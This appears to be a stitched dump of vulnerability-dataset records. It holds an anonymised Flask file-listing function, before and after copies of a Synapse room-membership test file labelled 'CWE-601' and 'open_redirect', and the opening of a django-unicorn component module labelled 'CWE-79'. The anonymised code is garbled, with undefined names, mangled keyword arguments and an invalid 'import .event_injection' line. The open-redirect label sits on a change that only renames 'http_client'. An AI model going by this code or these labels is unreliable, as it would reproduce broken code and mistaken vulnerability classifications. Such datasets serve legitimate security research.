def FUNC_1(VAR_10, VAR_11=0, VAR_12=1, VAR_13=None, VAR_14=0, VAR_15=sys.maxsize):
global VAR_6
if VAR_10 == "0":
VAR_10 = VAR_3
VAR_10 = FUNC_7(VAR_10)
VAR_21 = None
VAR_24 = 0.
VAR_21, VAR_24 = FUNC_2(VAR_13)
VAR_25, VAR_6 = FUNC_9(VAR_10, VAR_24, VAR_21, VAR_11, VAR_12)
VAR_26 = len(VAR_25)
VAR_14 = start if VAR_14 > 0 else 0
VAR_27 = min(VAR_26, VAR_14 + VAR_15) if VAR_15 > 0 else VAR_26
VAR_25 = base_list[VAR_14:VAR_27]
VAR_26 = VAR_27 - VAR_14
def FUNC_10():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_26)
for VAR_31 in VAR_25:
VAR_31 = path.strip()
yield FUNC_4(VAR_16=VAR_31) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_10()),
status="200 OK",
VAR_28=headers)
def FUNC_2(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_21 = None
if len(VAR_29) > 1:
VAR_21 = int(VAR_29[1])
if VAR_30 == 'r' or VAR_21 is None:
VAR_21 = random.randrange(10000)
VAR_24 = 0.1 # default VAR_20 = 0.1%
if len(VAR_29) > 2:
VAR_24 = float(VAR_29[2])
return VAR_21, round(VAR_24, 4)
@VAR_8.route('/id/<VAR_31:VAR_16>')
def FUNC_3(VAR_16):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_4(VAR_16=object_path),
"200 OK",
VAR_28=headers)
def FUNC_4(VAR_16):
VAR_31 = FUNC_7(VAR_16)
VAR_32 = {'_gt_label': VAR_6}
if VAR_6 in VAR_31:
return '<object id={} src={} VAR_32={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)),
quoteattr(url_for('.get_object_meta', VAR_17=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)))
@VAR_8.route('/VAR_32/<VAR_31:VAR_17>')
def FUNC_5(VAR_17=False):
VAR_33 = dict()
if VAR_17:
VAR_33['_gt_label'] = VAR_6
return jsonify(VAR_33)
def FUNC_6(VAR_16):
if VAR_2:
return 'file://' + FUNC_7(VAR_16)
return url_for('.get_object_src_http', VAR_18=VAR_16)
def FUNC_7(VAR_18):
return safe_join(VAR_4, VAR_18)
@VAR_8.route('/obj/<VAR_31:VAR_18>')
def FUNC_8(VAR_18):
VAR_31 = FUNC_7(VAR_18)
VAR_28 = Headers()
VAR_34 = send_file(VAR_31,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_34.headers.extend(VAR_28)
return VAR_34
def FUNC_9(VAR_19, VAR_20=0.05, VAR_21=42, VAR_22=0, VAR_23=1):
VAR_35 = ['STREAM', "{:.2f}".format(VAR_20), str(VAR_22), str(VAR_23), str(VAR_21)]
VAR_36 = '_'.join(VAR_35)
VAR_36 = os.path.join(VAR_19, VAR_36)
VAR_37 = os.path.join(VAR_19, 'POSITIVE')
VAR_38 = os.path.join(VAR_19, 'NEGATIVE')
VAR_39 = open(VAR_37).readline().rstrip()
VAR_40 = VAR_39.split('/')[-2] # Assuming all positives are in the same parent dir
VAR_9.info("Dir {} BR: {} Seed:{} FP{}".format(VAR_19, VAR_20, VAR_21, VAR_36))
sys.stdout.flush()
if not os.path.exists(VAR_36):
VAR_41 = read_file_list(VAR_37) # same across servers
VAR_42 = read_file_list(VAR_38) # different across servers
random.Random(VAR_21).shuffle(VAR_41)
random.Random(VAR_21).shuffle(VAR_42)
VAR_43 = len(VAR_41)
VAR_44 = int(VAR_22 * (1.0 / VAR_23) * VAR_43)
VAR_45 = int((VAR_22+1) * (1.0 / VAR_23) * VAR_43)
VAR_41 = positive_data[VAR_44:VAR_45]
VAR_43 = len(VAR_41)
VAR_46 = int(VAR_43 * (100./VAR_20 -1))
VAR_42 = negative_data[:VAR_46]
return write_data(VAR_36, [VAR_42, VAR_41], VAR_21), VAR_40
return read_file_list(VAR_36), VAR_40
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
29,
30,
37,
42,
45,
46,
51,
52,
54,
56,
68,
73,
74,
75,
78,
83,
88,
90,
94,
96,
98,
102,
119,
126,
135,
139,
140,
146,
148,
152,
154,
157,
161,
163,
164,
172,
178,
186,
189,
203,
205,
104,
105,
106,
107,
174,
175,
176,
177
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
29,
30,
37,
42,
45,
46,
51,
52,
54,
56,
68,
73,
74,
75,
78,
83,
88,
90,
94,
96,
98,
102,
119,
126,
135,
139,
140,
146,
148,
152,
154,
157,
161,
163,
164,
172,
178,
186,
189,
203,
205,
104,
105,
106,
107,
174,
175,
176,
177
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, room
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import event_injection
from tests.utils import TestHomeServer
class RoomMemberStoreTestCase(unittest.HomeserverTestCase):
servlets = [
login.register_servlets,
register_servlets_for_client_rest_resource,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
resource_for_federation=Mock(), http_client=None
)
return hs
def prepare(self, reactor, clock, hs: TestHomeServer):
# We can't test the RoomMemberStore on its own without the other event
# storage logic
self.store = hs.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
# User elsewhere on another host
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def test_one_member(self):
# Alice creates the room, and is automatically joined
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
rooms_for_user = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in rooms_for_user])
def test_count_known_servers(self):
"""
_count_known_servers will calculate how many servers are in a room.
"""
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
servers = self.get_success(self.store._count_known_servers())
self.assertEqual(servers, 2)
def test_count_known_servers_stat_counter_disabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def test_count_known_servers_stat_counter_enabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
# Initialises to 1 -- itself
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
# No rooms have been joined, so technically the SQL returns 0, but it
# will still say it knows about itself.
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
# It now knows about Charlie's server.
self.assertEqual(self.store._known_servers_count, 2)
def test_get_joined_users_from_context(self):
room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
bob_event = self.get_success(
event_injection.inject_member_event(
self.hs, room, self.u_bob, Membership.JOIN
)
)
# first, create a regular event
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[bob_event.event_id],
type="m.test.1",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
# Regression test for #7376: create a state event whose key matches bob's
# user_id, but which is *not* a membership event, and persist that; then check
# that `get_joined_users_from_context` returns the correct users for the next event.
non_member_event = self.get_success(
event_injection.inject_event(
self.hs,
room_id=room,
sender=self.u_bob,
prev_event_ids=[bob_event.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[non_member_event.event_id],
type="m.test.3",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
class CurrentStateMembershipUpdateTestCase(unittest.HomeserverTestCase):
def prepare(self, reactor, clock, homeserver):
self.store = homeserver.get_datastore()
self.room_creator = homeserver.get_room_creation_handler()
def test_can_rerun_update(self):
# First make sure we have completed all updates.
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
# Now let's create a room, which will insert a membership
user = UserID("alice", "test")
requester = create_requester(user)
self.get_success(self.room_creator.create_room(requester, {}))
# Register the background update to run again.
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
# ... and tell the DataStore that it hasn't finished all updates yet
self.store.db_pool.updates._all_done = False
# Now let's actually drive the updates to completion
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, room
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import event_injection
from tests.utils import TestHomeServer
class RoomMemberStoreTestCase(unittest.HomeserverTestCase):
servlets = [
login.register_servlets,
register_servlets_for_client_rest_resource,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
resource_for_federation=Mock(), federation_http_client=None
)
return hs
def prepare(self, reactor, clock, hs: TestHomeServer):
# We can't test the RoomMemberStore on its own without the other event
# storage logic
self.store = hs.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
# User elsewhere on another host
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def test_one_member(self):
# Alice creates the room, and is automatically joined
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
rooms_for_user = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in rooms_for_user])
def test_count_known_servers(self):
"""
_count_known_servers will calculate how many servers are in a room.
"""
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
servers = self.get_success(self.store._count_known_servers())
self.assertEqual(servers, 2)
def test_count_known_servers_stat_counter_disabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def test_count_known_servers_stat_counter_enabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
# Initialises to 1 -- itself
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
# No rooms have been joined, so technically the SQL returns 0, but it
# will still say it knows about itself.
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
# It now knows about Charlie's server.
self.assertEqual(self.store._known_servers_count, 2)
def test_get_joined_users_from_context(self):
room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
bob_event = self.get_success(
event_injection.inject_member_event(
self.hs, room, self.u_bob, Membership.JOIN
)
)
# first, create a regular event
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[bob_event.event_id],
type="m.test.1",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
# Regression test for #7376: create a state event whose key matches bob's
# user_id, but which is *not* a membership event, and persist that; then check
# that `get_joined_users_from_context` returns the correct users for the next event.
non_member_event = self.get_success(
event_injection.inject_event(
self.hs,
room_id=room,
sender=self.u_bob,
prev_event_ids=[bob_event.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[non_member_event.event_id],
type="m.test.3",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
class CurrentStateMembershipUpdateTestCase(unittest.HomeserverTestCase):
def prepare(self, reactor, clock, homeserver):
self.store = homeserver.get_datastore()
self.room_creator = homeserver.get_room_creation_handler()
def test_can_rerun_update(self):
# First make sure we have completed all updates.
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
# Now let's create a room, which will insert a membership
user = UserID("alice", "test")
requester = create_requester(user)
self.get_success(self.room_creator.create_room(requester, {}))
# Register the background update to run again.
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
# ... and tell the DataStore that it hasn't finished all updates yet
self.store.db_pool.updates._all_done = False
# Now let's actually drive the updates to completion
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
| open_redirect | {
"code": [
" resource_for_federation=Mock(), http_client=None"
],
"line_no": [
39
]
} | {
"code": [
" resource_for_federation=Mock(), federation_http_client=None"
],
"line_no": [
39
]
} |
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, VAR_7
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import .event_injection
from tests.utils import TestHomeServer
class CLASS_0(unittest.HomeserverTestCase):
VAR_0 = [
login.register_servlets,
register_servlets_for_client_rest_resource,
VAR_7.register_servlets,
]
def FUNC_0(self, VAR_1, VAR_2):
VAR_3 = self.setup_test_homeserver(
resource_for_federation=Mock(), http_client=None
)
return VAR_3
def FUNC_1(self, VAR_1, VAR_2, VAR_3: TestHomeServer):
self.store = VAR_3.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def FUNC_2(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_5 = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in VAR_5])
def FUNC_3(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
VAR_6 = self.get_success(self.store._count_known_servers())
self.assertEqual(VAR_6, 2)
def FUNC_4(self):
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def FUNC_5(self):
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
self.assertEqual(self.store._known_servers_count, 2)
def FUNC_6(self):
VAR_7 = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_8 = self.get_success(
event_injection.inject_member_event(
self.hs, VAR_7, self.u_bob, Membership.JOIN
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_8.event_id],
type="m.test.1",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
VAR_12 = self.get_success(
event_injection.inject_event(
self.hs,
room_id=VAR_7,
sender=self.u_bob,
prev_event_ids=[VAR_8.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_12.event_id],
type="m.test.3",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_1(self, VAR_1, VAR_2, VAR_4):
self.store = VAR_4.get_datastore()
self.room_creator = VAR_4.get_room_creation_handler()
def FUNC_7(self):
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
VAR_13 = UserID("alice", "test")
VAR_14 = create_requester(VAR_13)
self.get_success(self.room_creator.create_room(VAR_14, {}))
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
self.store.db_pool.updates._all_done = False
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
|
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, VAR_7
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import .event_injection
from tests.utils import TestHomeServer
class CLASS_0(unittest.HomeserverTestCase):
VAR_0 = [
login.register_servlets,
register_servlets_for_client_rest_resource,
VAR_7.register_servlets,
]
def FUNC_0(self, VAR_1, VAR_2):
VAR_3 = self.setup_test_homeserver(
resource_for_federation=Mock(), federation_http_client=None
)
return VAR_3
def FUNC_1(self, VAR_1, VAR_2, VAR_3: TestHomeServer):
self.store = VAR_3.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def FUNC_2(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_5 = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in VAR_5])
def FUNC_3(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
VAR_6 = self.get_success(self.store._count_known_servers())
self.assertEqual(VAR_6, 2)
def FUNC_4(self):
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def FUNC_5(self):
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
self.assertEqual(self.store._known_servers_count, 2)
def FUNC_6(self):
VAR_7 = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_8 = self.get_success(
event_injection.inject_member_event(
self.hs, VAR_7, self.u_bob, Membership.JOIN
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_8.event_id],
type="m.test.1",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
VAR_12 = self.get_success(
event_injection.inject_event(
self.hs,
room_id=VAR_7,
sender=self.u_bob,
prev_event_ids=[VAR_8.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_12.event_id],
type="m.test.3",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_1(self, VAR_1, VAR_2, VAR_4):
self.store = VAR_4.get_datastore()
self.room_creator = VAR_4.get_room_creation_handler()
def FUNC_7(self):
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
VAR_13 = UserID("alice", "test")
VAR_14 = create_requester(VAR_13)
self.get_success(self.room_creator.create_room(VAR_14, {}))
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
self.store.db_pool.updates._all_done = False
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
23,
27,
28,
30,
36,
42,
44,
45,
46,
48,
52,
53,
55,
57,
58,
60,
66,
68,
76,
79,
85,
89,
91,
93,
101,
103,
105,
106,
107,
109,
113,
115,
116,
118,
126,
127,
138,
143,
144,
145,
146,
172,
173,
178,
180,
187,
188,
192,
193,
204,
205,
207,
208,
215,
70,
71,
72,
81,
82,
83,
98,
99,
100
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
23,
27,
28,
30,
36,
42,
44,
45,
46,
48,
52,
53,
55,
57,
58,
60,
66,
68,
76,
79,
85,
89,
91,
93,
101,
103,
105,
106,
107,
109,
113,
115,
116,
118,
126,
127,
138,
143,
144,
145,
146,
172,
173,
178,
180,
187,
188,
192,
193,
204,
205,
207,
208,
215,
70,
71,
72,
81,
82,
83,
98,
99,
100
] |
1CWE-79
| import importlib
import inspect
import logging
import pickle
import sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import settings
from django.core.cache import caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.utils.html import conditional_escape
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
logger = logging.getLogger(__name__)
# TODO: Make maxsize configurable
location_cache = LRUCache(maxsize=100)
# Module cache to store the found component class by id
views_cache = LRUCache(maxsize=100)
# Module cache for constructed component classes
# This can create a subtle race condition so a more long-term solution needs to be found
constructed_views_cache = LRUCache(maxsize=100)
COMPONENTS_MODULE_CACHE_ENABLED = "pytest" not in sys.modules
def convert_to_snake_case(s: str) -> str:
# TODO: Better handling of dash->snake
return s.replace("-", "_")
def convert_to_pascal_case(s: str) -> str:
# TODO: Better handling of dash/snake->pascal-case
s = convert_to_snake_case(s)
return "".join(word.title() for word in s.split("_"))
def get_locations(component_name):
locations = []
if "." in component_name:
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Handle fully-qualified component names (e.g. `project.unicorn.HelloWorldView`)
class_name = component_name.split(".")[-1:][0]
module_name = component_name.replace("." + class_name, "")
locations.append((class_name, module_name))
# Assume if it ends with "View", then we don't need to add other
if component_name.endswith("View") or component_name.endswith("Component"):
return locations
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Use conventions to find the component class
class_name = convert_to_pascal_case(component_name)
if "." in class_name:
if class_name.split(".")[-1:]:
class_name = class_name.split(".")[-1:][0]
class_name = f"{class_name}View"
module_name = convert_to_snake_case(component_name)
unicorn_apps = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(unicorn_apps, list)
or isinstance(unicorn_apps, tuple)
or isinstance(unicorn_apps, set)
), "APPS is expected to be a list, tuple or set"
for app in unicorn_apps:
# Handle an installed app that actually points to an app config
if ".apps." in app:
app_config_idx = app.rindex(".apps.")
app = app[:app_config_idx]
app_module_name = f"{app}.components.{module_name}"
locations.append((class_name, app_module_name))
return locations
@timed
def construct_component(
component_class,
component_id,
component_name,
component_key,
parent,
request,
**kwargs,
):
"""
Constructs a class instance.
"""
component = component_class(
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
component.calls = []
component.children = []
component._children_set = False
component.mount()
component.hydrate()
component.complete()
component._validate_called = False
return component
class UnicornView(TemplateView):
response_class = UnicornTemplateResponse
component_name: str = ""
component_key: str = ""
request = None
parent = None
children = []
# Caches to reduce the amount of time introspecting the class
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
# Dictionary with key: attribute name; value: pickled attribute value
_resettable_attributes_cache: Dict[str, Any] = {}
# JavaScript method calls
calls = []
def __init__(self, **kwargs):
super().__init__(**kwargs)
assert self.component_name, "Component name is required"
if "id" in kwargs and kwargs["id"]:
# Sometimes the component_id is initially in kwargs["id"]
self.component_id = kwargs["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:component:{self.component_id}"
if "request" in kwargs:
self.setup(kwargs["request"])
if "parent" in kwargs:
self.parent = kwargs["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def _set_default_template_name(self) -> None:
"""
Sets a default template name based on component's name if necessary.
"""
get_template_names_is_valid = False
try:
# Check for get_template_names by explicitly calling it since it
# is defined in TemplateResponseMixin, but can throw ImproperlyConfigured.
self.get_template_names()
get_template_names_is_valid = True
except ImproperlyConfigured:
pass
if not self.template_name and not get_template_names_is_valid:
# Convert component name with a dot to a folder structure
template_name = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{template_name}.html"
@timed
def _set_caches(self) -> None:
"""
Setup some initial "caches" to prevent Python from having to introspect
a component UnicornView for methods and properties multiple times.
"""
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def reset(self):
for (
attribute_name,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
attribute_value = pickle.loads(pickled_value)
self._set_property(attribute_name, attribute_value)
except TypeError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be de-pickled."
)
pass
def call(self, function_name, *args):
"""
Add a JavaScript method name and arguments to be called after the component is rendered.
"""
self.calls.append({"fn": function_name, "args": args})
def mount(self):
"""
Hook that gets called when the component is first created.
"""
pass
